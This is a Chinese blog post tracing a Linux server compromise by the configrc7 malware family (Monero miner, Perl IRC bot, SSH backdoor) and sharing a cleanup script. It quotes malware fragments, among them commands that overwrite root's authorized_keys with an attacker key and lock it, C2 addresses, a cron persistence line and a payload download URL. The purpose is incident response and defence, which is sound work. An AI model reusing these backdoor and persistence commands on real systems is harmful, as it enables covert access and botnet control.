服务器被黑挖矿 + SSH 后门:一次 configrc7 家族病毒完整溯源与专杀实录
标签#Linux安全 #挖矿木马 #后门清除 #应急响应0. 写在前面今天下午收到两条云厂商告警服务器在非常用地登录并且开始对外发起 TCP:22 攻击平台直接把这台 ECS 的出站 22 端口封了。登上机器一看CPU 没飙高但/root下多了两个隐藏目录.configrc7和.ssh。随后的静态分析让我有点意外——这已经不是单纯的挖矿脚本了而是挖矿 IRC 远控后门 SSH 公钥后门 看门狗 日志擦除的组合套件。本文记录从发现、分析到清除的完整过程并放出可直接使用的专杀脚本。核心结论前置这台服务器已被取得 root且存在多条持久化通道。清完样本≠安全必须改密码、换密钥、排查所有后门必要时重装。1. 事发云平台的连环告警先上两张告警截图。收到第一条“异常登录”时我还在想是不是自己忘了关代理第二条“对外攻击 TCP:22”基本坐实机器被黑并且黑客在拿它继续横向扫描/爆破其他服务器。平台把出向 22 端口封到次日等于强制把我按在桌前处理。2. 现场勘查两个不起眼的隐藏目录登录服务器后第一步看/root因为告警是 root 登录。很快发现两个异常目录注意两个细节.configrc7修改时间是15:15:15.ssh是15:19:11二者相差约 4 分钟符合“先投挖矿、再装 SSH 后门”的时间线。.ssh被设为700且可能加了chattr ia后面会验证受害者自己删不掉authorized_keys。我先把这个目录树打包下载到本地分析环境全程只读静态分析绝不执行任何样本。3. 样本静态分析一个“套餐”式病毒样本结构如下在被感染服务器上的路径为/root/.configrc7/root/.configrc7/ ├── a/ # 挖矿组件 │ ├── crond # 主挖矿二进制UPX 打包的 XMRig 家族 ELF2.2MB │ ├── cert.pem # 自签名证书CNlocalhost │ ├── cert_key.pem │ ├── run # 启动脚本stop - nohup ./crond - 写 bash.pid │ ├── stop # 杀掉竞品/历史挖矿进程名 │ ├── upd # 看门狗被杀后自动重启 ./run │ ├── a # 安装器写 MSR、配大页、设 /usr/bin 只读 │ ├── init01/init02 # 批量清理其它挖矿木马 │ ├── delsshd # 清理竞品启动项 │ └── rmkwork # 日志擦除 下载二级载荷 kw0rker ├── b/ # 后门组件 │ ├── run # 自解压脚本内嵌 3 个 Perl IRC bot 安装 SSH 公钥 │ ├── a # 入口cd /root/.configrc7/b; ./run │ ├── stop # 清场杀 edac0 / sync / ps / pool 等 │ └── sync # 看门狗 └── cron.d # 持久化计划任务3.1 挖矿组件 a/a/crond是 UPX 打包的 ELF体积 2.2MB运行后进程名显示为crond伪装。通过strings可看到msr/xmr/pool及 UPX 特征确认是XMRig 门罗币挖矿程序。配套脚本做了 XMRig 典型的 CPU 调优# 来自 a/a 中的 optimize_funcwrmsr-a0xc0011020 0x4400000000000# AMD Zen 寄存器调优wrmsr-a0x1a4 0xf# Intel 禁用预取sysctl-wvm.nr_hugepages$(nproc)# 大页内存a/run负责启动./stop先清场 →nohup ./crond挖矿 → 把 PID 写进bash.pid。a/upd作为看门狗每分钟检查 PID 是否存活死了就重启。3.2 IRC 后门组件 b/b/run表面上是个 111KB 的 shell 脚本开头三行#!/bin/shnohup./stop/dev/nullsleep5随后echo出三段base64解码后是 3 个Perl “Stealth ShellBot” IRC 后门my$processoedac0;# 伪装进程名$servidor0xB32B8B53;# 十六进制编码的 IP 179.43.139.83my$porta443;mycanais(#001);# IRC 频道myadms(molly,polly);# 管理员昵称三个后门分别指向服务器端口频道伪装进程179.43.139.83443#001edac0179.43.139.83443#001edac0209.99.186.7443#009edac0也就是说机器不只是被挖矿还被并入了 IRC 僵尸网络随时可能被下发 DDoS、下载、反弹 shell 等指令。更狠的是b/run末尾这几行chattr-ia-R~/.sshcd~rm-rf.sshmkdir.sshechossh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4... mdrfckr.ssh/authorized_keyschmod-Rgo~/.ssh chattr ia-R~/.ssh直接重写 root 的 authorized_keys 并加 immutable 锁。这就是告警里“异常登录”的来源——黑客给自己留了永久 SSH 通道改密码都拦不住。3.3 第三处隐藏载荷cron.d里还藏了一条0 0 */3 * * /tmp/.X291-unix/.rsync/c/aptitude /dev/null 21这是独立于 a/b 的第三段持久化说明/tmp/.X291-unix下也可能有载荷需要一并清理。3.4 持久化与反清理手段样本把 Linux 下能用的反清理手段基本用了一遍计划任务reboot启动看门狗保证开机复活看门狗a/upd、b/sync监控进程被杀即重启不可变属性chattr ia锁.ssh、~/.configrc7、/usr/bin/systemtd隐藏工具把真实chattr重命名为lkei让受害者找不到chattr目录只读安装器chmod -w /usr/bin导致你无法在/usr/bin里新增/删除文件诱饵文件创建/usr/bin/systemtd不可变空文件日志擦除rmkwork清空/var/log/auth.log、wtmp、lastlog、btmp、utmp等竞争清理init01/init02里有一长串竞品挖矿木马名单目的不是做好事而是为了独占 CPU。4. 处置专杀脚本 configrc7_killer.sh基于以上 IOC我写了一个专杀脚本。设计原则按路径/命令行精确匹配不误杀系统正常crond先恢复环境chattr、/usr/bin 写权限再删文件仅删除攻击者 SSH 公钥保留用户自己的合法 key支持DRYRUN1先演练支持QUARANTINE1隔离不删除。脚本逻辑1. 恢复 /usr/bin 写权限还原被重命名的 chattr (lkei) 2. chattr -iaR 解除已知路径的不可变属性 3. 按 exe/cwd/cmdline 杀恶意进程并按 C2 连接补刀 4. 删除/隔离 /root/.configrc7、/tmp/.X291-unix、/usr/bin/systemtd 5. 清理攻击者 SSH 公钥修正 .ssh 权限 6. 清理 crontab 持久化 7. iptables 阻断 C2 IP 8. 验证残留核心代码片段完整脚本见附件或文末链接# 精确杀进程不误伤系统 crondforpidin$(ls/proc|grep-E^[0-9]$);doexe$(readlink /proc/$pid/exe2/dev/null)cwd$(readlink /proc/$pid/cwd2/dev/null)cmd$(tr\0 /proc/$pid/cmdline2/dev/null)case$exein*.configrc7*|*.X291-unix*)kill-9$pid;;esaccase$cwdin*.configrc7*|*.X291-unix*)kill-9$pid;;esaccase$cmdin*.configrc7*|edac0*|kw0rker*)kill-9$pid;;esacdone# 仅删除攻击者公钥保留合法 keyATTACKER_KEYAAAAB3NzaC1yc2EAAAABJQAAAQEArDp4grep-vF$ATTACKER_KEY$f$f.tmpmv$f.tmp$f使用方法# 0. 以 root 上传到被感染服务器chmodx configrc7_killer.sh# 1. 先只读演练DRYRUN1bashconfigrc7_killer.sh# 2. 正式清除bashconfigrc7_killer.sh# 3. 若想保留样本做进一步分析QUARANTINE1bashconfigrc7_killer.sh执行后查看/var/log/configrc7_killer.log与verify()输出确认无残留进程和 crontab。5. 清除后的必做善后再次强调样本被清掉不等于机器安全。因为它已取得 root 并植入了 SSH 后门理论上可以写任意文件、改任意配置。清除样本后必须做改所有 SSH 密码包括 root 和其他所有账户轮换所有密钥检查每个用户的~/.ssh/authorized_keys排查隐藏后门systemctl list-units、/etc/rc.local、/etc/profile.d/、/etc/init.d/、/etc/cron.*防火墙封禁 C2179.43.139.83、209.99.186.7、208.84.102.192如无法确认干净建议重装系统或从可信备份恢复。6. 复盘与防御建议这次入侵的入口最可能是SSH 弱口令 / 密钥泄露。防御建议禁止 root 密码登录改用密钥登录修改默认 22 端口或限制来源 IP安装 fail2ban / 云厂商安全组做登录频次限制敏感服务器关闭公网 SSH改走跳板机 / 堡垒机定期备份 监控/root/tmp/var/tmp下异常隐藏目录重要业务资产启用防篡改但不是靠chattr ia这种可绕过的小技巧。附录完整 IOC 清单类型IOC安装目录/root/.configrc7/a/、/root/.configrc7/b/隐藏载荷/tmp/.X291-unix/.rsync/c/aptitude挖矿进程真实路径含.configrc7/a/crond进程名伪装为crondIRC bot 进程伪装进程名edac0SSH 后门公钥ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4... mdrfckr看门狗/root/.configrc7/a/upd、/root/.configrc7/b/sync诱饵/锁文件/usr/bin/systemtd、被重命名的/usr/bin/lkeiC2 IP179.43.139.83:443、209.99.186.7:443二级下载http://208.84.102.192/kw0rker计划任务标记.configrc7、.X291、/a/upd、/b/sync、aptitude如果你也遇到.configrc7这个目录可以直接用上面的专杀脚本。如果脚本在你的发行版上跑不通欢迎在评论区贴报错我会持续更新。

相关新闻

从 Copilot 到 Agent—— 我的开发工作流正在被颠覆

从 Copilot 到 Agent—— 我的开发工作流正在被颠覆

摘要曾经 GitHub Copilot 只是 IDE 里的代码补全工具,帮我少敲几行循环、省掉重复模板代码;但 2026 年 AI 编程已经完成范式跃迁:具备自主规划、多文件修改、自动自测、提交 PR 全链路能力的开发 Agent,直接重构了完整研发工作流。…

2026/7/30 6:15:38 阅读更多 →
九方通逊:第31周物流资讯

九方通逊:第31周物流资讯

​👉#物流资讯——1.亚马逊北美站收紧锂电池小家电合规2.达飞海运宣布征收紧急燃油附加费3.全美1940万大学生推动返校季宿舍装饰市场👉#海外仓资讯——1.德国开展海外仓巡查整治,合规成长久之道2.美国海外仓助力跨境企业稳定经营控制成本3.Te…

2026/7/30 6:15:38 阅读更多 →
SSM框架实战:水果电商系统设计与防超卖实现

SSM框架实战:水果电商系统设计与防超卖实现

1. 项目概述:SSM框架下的水果销售系统全解析这个基于SSM(SpringSpringMVCMyBatis)框架的水果销售系统,是我在电商领域摸爬滚打多年后的一次技术沉淀。不同于市面上那些只给个空壳子的"教学项目",这套系统从商…

2026/7/30 6:14:38 阅读更多 →

最新新闻

Node.js Express框架从零入门:安装、核心概念与REST API实战

Node.js Express框架从零入门:安装、核心概念与REST API实战

1. 项目概述:为什么是Express? 如果你刚开始接触Node.js后端开发,大概率会听到一个名字:Express。它几乎是Node.js生态里Web框架的代名词,就像Python里的Flask或Django。但很多新手在安装和第一步使用上就会遇到各种“…

2026/7/30 6:20:40 阅读更多 →
2024年QQ昵称获取实战:Python爬虫解析QQ空间页面

2024年QQ昵称获取实战:Python爬虫解析QQ空间页面

1. 项目缘起:为什么我们需要一个“最新”的QQ昵称接口?最近在捣鼓一个社群管理的小工具,需要批量获取一些QQ用户的昵称来做数据分析。一开始,我理所当然地想着去网上找个现成的接口,结果一搜,好家伙&#x…

2026/7/30 6:20:40 阅读更多 →
如何解决AI幻觉风险?一文看懂强监管行业AI问答优化服务商

如何解决AI幻觉风险?一文看懂强监管行业AI问答优化服务商

一、当下强监管行业AI问答的现状 现在AI问答已经广泛用在金融、医疗、政务、医药这些监管严格的行业,不管是给客户做咨询解答,还是企业内部员工查询政策制度,AI都可以快速给出回答,大大提升工作效率新华网。 但是大模型本身存在AI…

2026/7/30 6:20:40 阅读更多 →
GPU裸金属和GPU容器有什么区别?从隔离原理到选型一文讲清

GPU裸金属和GPU容器有什么区别?从隔离原理到选型一文讲清

前言 租用GPU算力时,许多GPU云平台会提供容器化实例和裸金属等不同交付形态。两者价格差异明显,但区别不只是价格——隔离方式、系统权限、启动速度、适用场景都不一样。选错了,要么多花钱,要么任务跑不起来。本文从底层隔离原理讲…

2026/7/30 6:20:40 阅读更多 →
STM32 DMA技术深度解析:从核心原理到实战应用

STM32 DMA技术深度解析:从核心原理到实战应用

1. 项目概述:为什么DMA是STM32性能的“隐形翅膀”?搞STM32开发的朋友,对DMA这个词肯定不陌生。但很多时候,我们只是照着例程配置一下,让它跑起来,至于它到底怎么工作的、为什么能提升效率、以及配置时那些坑…

2026/7/30 6:20:40 阅读更多 →
电子电路入门:从符号到整流、稳压、放大核心电路全解析

电子电路入门:从符号到整流、稳压、放大核心电路全解析

1. 从符号到系统:一次搞懂电路图的“语言”与“骨架”刚入行那会儿,最怕的就是看电路图。满纸的三角形、波浪线、交叉线,还有一堆标注,感觉像在看天书。后来才明白,电路图其实就是电子工程师的“施工蓝图”和“交流语言…

2026/7/30 6:19:40 阅读更多 →

日新闻

Windows驱动存储终极清理工具:DriverStoreExplorer完全指南

Windows驱动存储终极清理工具:DriverStoreExplorer完全指南

Windows驱动存储终极清理工具:DriverStoreExplorer完全指南 【免费下载链接】DriverStoreExplorer Driver Store Explorer 项目地址: https://gitcode.com/gh_mirrors/dr/DriverStoreExplorer 您是否曾因Windows系统盘空间不足而烦恼?是否遇到过设…

2026/7/30 0:00:13 阅读更多 →
如何3步掌握Video Download Helper:网页视频下载的完整实战指南

如何3步掌握Video Download Helper:网页视频下载的完整实战指南

如何3步掌握Video Download Helper:网页视频下载的完整实战指南 【免费下载链接】VideoDownloadHelper Chrome Extension to Help Download Video for Some Video Sites. 项目地址: https://gitcode.com/gh_mirrors/vi/VideoDownloadHelper 你是否曾经在浏览…

2026/7/30 0:00:13 阅读更多 →
“双减”后首个AI备课压力测试报告:覆盖32所中小学的176节AI辅助课,暴露4大隐性增负节点

“双减”后首个AI备课压力测试报告:覆盖32所中小学的176节AI辅助课,暴露4大隐性增负节点

更多请点击: https://intelliparadigm.com 第一章:AI 教师备课辅助 AI 教师备课辅助系统正逐步成为教育数字化转型的核心支撑工具,它并非替代教师,而是通过语义理解、知识图谱与多模态生成能力,将教师从重复性劳动中解…

2026/7/30 0:00:13 阅读更多 →

周新闻

深度学习道路桥梁裂缝检测系统 道路桥梁裂缝检测数据集 道路桥梁病害识别检测数据集

深度学习道路桥梁裂缝检测系统 道路桥梁裂缝检测数据集 道路桥梁病害识别检测数据集

深度学习道路桥梁裂缝检测系统 数据集6000张 完整源码已标注数据集训练好的模型环境配置教程程序运行说明文档,可以直接使用!系统支持图片、视频、摄像头等多种方式检测裂缝,功能强大实用。 1数据集6000张 8各类别

2026/7/29 22:18:20 阅读更多 →
深度学习YOLO模型如何训练 PUBG 绝地求生目标检测数据集

深度学习YOLO模型如何训练 PUBG 绝地求生目标检测数据集

pubg数据集 精选原图1.42万数据 1.49万标签 无任何重复、算法增强或冗余图像! pubg绝地求生目标检测数据集 1分类:e_body,14905个标签,txt格式 共计14244张图,99%为640*640尺寸图像 适合yolo目标检测、AI训练关键词&am…

2026/7/29 14:34:28 阅读更多 →
Apex英雄目标检测数据集 深度学习框架YOLO如何训练APEX数据集

Apex英雄目标检测数据集 深度学习框架YOLO如何训练APEX数据集

Apex检测数据集数据集详情检测类别: allies enemy tag图片总量:7247张训练集:5139张验证集:1425张测试集:683张标注状态:全部已标注,即拿即用数据格式:支持YOLO格式及其他格式&#…

2026/7/29 15:00:03 阅读更多 →

月新闻